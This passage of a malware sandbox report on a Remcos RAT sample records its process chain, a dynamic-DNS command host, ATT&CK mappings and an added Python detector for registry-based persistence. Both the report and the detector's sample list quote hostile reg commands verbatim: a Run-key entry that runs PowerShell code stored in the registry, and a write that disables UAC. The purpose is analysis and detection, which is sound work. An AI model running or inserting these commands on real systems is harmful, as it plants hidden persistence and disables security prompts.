          Source: Amcache.hve.33.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.33.dr; Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
          Source: Amcache.hve.33.dr; Binary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Users\user\Desktop\anziOUzZJs.exe; API call chain: ExitProcess graph end node (graph_0-3610)
          Source: C:\Users\user\Desktop\anziOUzZJs.exe; API call chain: ExitProcess graph end node (graph_0-3605)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 10_2_02AAD8A4 LdrInitializeThunk,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
          Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
          Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "preferentialist" /t reg_expand_sz /d "%therapeutic% -windowstyle minimized $terrain=(get-itemproperty -path 'hkcu:\corycia\').mandskaber;%therapeutic% ($terrain)"
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Manager
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Manager-
          Source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program ManagerTRI
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Manager4D\[
          Source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Manager6)\Comm
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Managertdesk@
          Sources: powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2009656049.000000000814A000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: [Program Manager]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\cmd.exe; Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (3 occurrences)
          Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (4 occurrences)
          Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (3 occurrences)
          Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
          Source: C:\Windows\System32\svchost.exe; Queries volume information: C:\ VolumeInformation (2 occurrences)
          Source: C:\Users\user\Desktop\anziOUzZJs.exe; Code function: 0_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA

          Lowering of HIPS / PFW / Operating System Security Settings

          Source: C:\Windows\SysWOW64\reg.exe; Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
          Source: Amcache.hve.33.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.33.dr; Binary or memory string: msmpeng.exe
          Source: Amcache.hve.33.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.33.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
          Source: Amcache.hve.33.dr; Binary or memory string: MsMpEng.exe
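          The two reg.exe commands this report records are the lines a detection engineer would write rules against: the Run value "Preferentialist", whose REG_EXPAND_SZ data launches whatever %Therapeutic% expands to and hands it a script read back from the registry value mandskaber under HKCU:\Corycia, and the EnableLUA=0 write under Policies\System that turns off UAC prompting. The Python below is an added example and is not part of the Joe Sandbox report or of the GuLoader/Remcos tooling it analyses. It parses reg add command lines as they appear in process-creation telemetry and flags four traits: a Run-key write, a launcher hidden behind an environment variable, a script body stored in another registry value, and the EnableLUA=0 policy change. The report does not say what %Therapeutic% contains, so the rule only records that the launcher is an environment variable rather than a path; the two benign command lines in the sample set are constructed here, not taken from the report.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of process-creation command lines. The first two are the
# reg.exe invocations recorded in the report (Run-key persistence and the
# EnableLUA write); the last two are benign look-alikes added here so the rules
# can be shown not to fire on an ordinary Run entry or on re-enabling UAC.
SAMPLE_CMDLINES = [
    '"C:\\Windows\\System32\\cmd.exe" /c REG ADD '
    'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /f /v "Preferentialist" '
    '/t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized '
    "$Terrain=(Get-ItemProperty -Path 'HKCU:\\Corycia\\').mandskaber;%Therapeutic% ($Terrain)\"",
    "C:\\Windows\\System32\\reg.exe ADD "
    "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System "
    "/v EnableLUA /t REG_DWORD /d 0 /f",
    'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v OneDrive /t REG_SZ '
    '/d "C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background" /f',
    "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System "
    "/v EnableLUA /t REG_DWORD /d 1 /f",
]

RUN_KEY_SUFFIXES = (r"\currentversion\run", r"\currentversion\runonce")
UAC_POLICY_SUFFIX = r"\currentversion\policies\system"
# PowerShell reading a value out of some registry key and using it as code,
# in the exact shape seen in the report: (Get-ItemProperty -Path 'HKCU:\X\').Y
REGISTRY_PAYLOAD = re.compile(
    r"\(\s*get-itemproperty\s+-path\s+'?(?P<key>hk[a-z]+:[^')]*)'?\s*\)\.(?P<value>\w+)",
    re.IGNORECASE,
)
ENV_LAUNCHER = re.compile(r"^%[^%]+%")  # data begins with an environment variable


def split_cmdline(cmdline: str) -> list[str]:
    """Split on whitespace outside double quotes and drop the quotes.
    Backslashes are literal, which matches how reg.exe receives its arguments."""
    tokens: list[str] = []
    cur: list[str] = []
    in_quotes = False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


@dataclass
class RegAdd:
    key: str
    name: str | None = None
    type: str | None = None
    data: str | None = None
    force: bool = False


def parse_reg_add(cmdline: str) -> RegAdd | None:
    """Parse a 'reg add' invocation, tolerating a cmd.exe /c wrapper and a
    full path to reg.exe; returns None for anything else."""
    toks = split_cmdline(cmdline)
    start = next((i for i, t in enumerate(toks)
                  if t.rsplit("\\", 1)[-1].lower() in ("reg", "reg.exe")), None)
    if start is None or len(toks) < start + 3 or toks[start + 1].lower() != "add":
        return None
    reg = RegAdd(key=toks[start + 2])
    j = start + 3
    while j < len(toks):
        opt = toks[j].lower()
        if opt in ("/v", "/t", "/d") and j + 1 < len(toks):
            setattr(reg, {"/v": "name", "/t": "type", "/d": "data"}[opt], toks[j + 1])
            j += 2
        else:
            reg.force = reg.force or opt == "/f"  # /ve, /s <sep>, /reg:32 are not needed here
            j += 1
    return reg


@dataclass
class Finding:
    rule: str
    detail: str


def classify(cmdline: str) -> list[Finding]:
    """Apply the persistence and UAC rules to one process-creation command line."""
    reg = parse_reg_add(cmdline)
    if reg is None:
        return []
    key = reg.key.lower().rstrip("\\")
    data = reg.data or ""
    findings: list[Finding] = []
    if key.endswith(RUN_KEY_SUFFIXES):
        findings.append(Finding("run_key_persistence", f"{reg.key}\\{reg.name}"))
        env = ENV_LAUNCHER.match(data)
        if env:
            # The binary that runs at logon is chosen by an environment variable,
            # so the Run value itself never names an executable path.
            findings.append(Finding("launcher_hidden_in_env_var", env.group(0)))
        payload = REGISTRY_PAYLOAD.search(data)
        if payload:
            findings.append(Finding("payload_stored_in_registry",
                                    f"{payload['key']} -> {payload['value']}"))
    if (key.endswith(UAC_POLICY_SUFFIX) and (reg.name or "").lower() == "enablelua"
            and data.strip() in ("0", "0x0")):
        findings.append(Finding("uac_disabled", f"{reg.key}\\EnableLUA = 0"))
    return findings


def scan(cmdlines: list[str]) -> list[list[str]]:
    """Rule names that fire for each command line, in input order."""
    return [[f.rule for f in classify(c)] for c in cmdlines]


if __name__ == "__main__":
    for cmdline, rules in zip(SAMPLE_CMDLINES, scan(SAMPLE_CMDLINES)):
        print(rules or ["-"], cmdline[:70])
```

          Run as a script it prints the rule hits for each sample line. A rule that only looks for an .exe path or for powershell.exe in Run-key data misses this entry, because the Run value holds neither: the environment-variable launcher and the registry read are the traits that make it distinctive, and the EnableLUA write in the same chain is the second independent indicator.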

          Stealing of Sensitive Information

          Source: Yara match; File source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR

          Remote Access Functionality

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Mutex created: \Sessions\1\BaseNamedObjects\Rmc-7CSH4D
          Source: Yara match; File source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR
MITRE ATT&CK Matrix (listed per tactic; the number in front of a technique is the hit count shown in the report, techniques without a number carry no count)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Windows Management Instrumentation; 11 Command and Scripting Interpreter; 2 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 12 Process Injection; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 111 Masquerading; 1 Modify Registry; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 12 Process Injection
Credential Access: 11 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 3 File and Directory Discovery; 24 System Information Discovery; 121 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 11 Input Capture; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Remote Access Software; 2 Non-Application Layer Protocol; 213 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 1502984; Sample: anziOUzZJs.exe; Startdate: 02/09/2024; Architecture: WINDOWS; Score: 100
(numbers after a process name are the counts shown next to it in the graph; see the legend above)

Start
  DNS/IP: a458386d9.duckdns.org (Uses dynamic DNS services); drive.usercontent.google.com; drive.google.com
  Signatures: Found malware configuration; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 5 other signatures
  • anziOUzZJs.exe (32) started
      Dropped: C:\Users\user\AppData\Local\...\BgImage.dll, PE32; C:\Users\user\AppData\Local\...\nsExec.dll, PE32; C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32
      Signatures: Suspicious powershell command line found
      • powershell.exe (5 29) started
          DNS/IP: drive.usercontent.google.com 142.250.181.225, 443, 49729 GOOGLEUS United States; drive.google.com 142.250.184.238, 443, 49726 GOOGLEUS United States
          Dropped: C:\Users\user\AppData\...\Partivarerne.scr, PE32; C:\ProgramData\remcos\logs.dat, data
          Signatures: Detected Remcos RAT; Drops PE files with a suspicious file extension; Found suspicious powershell code related to unpacking or dynamic code loading; 2 other signatures
          • cmd.exe (1) started
              Signatures: Uses cmd line tools excessively to alter registry or file data
              • reg.exe (1) started
                  Signatures: Disables UAC (registry)
              • conhost.exe started
          • cmd.exe (1) started
              • conhost.exe started
              • reg.exe (1 1) started
          • WerFault.exe (23 16) started
          • 2 other processes started
  • svchost.exe (1 1) started
      DNS/IP: 127.0.0.1 unknown unknown
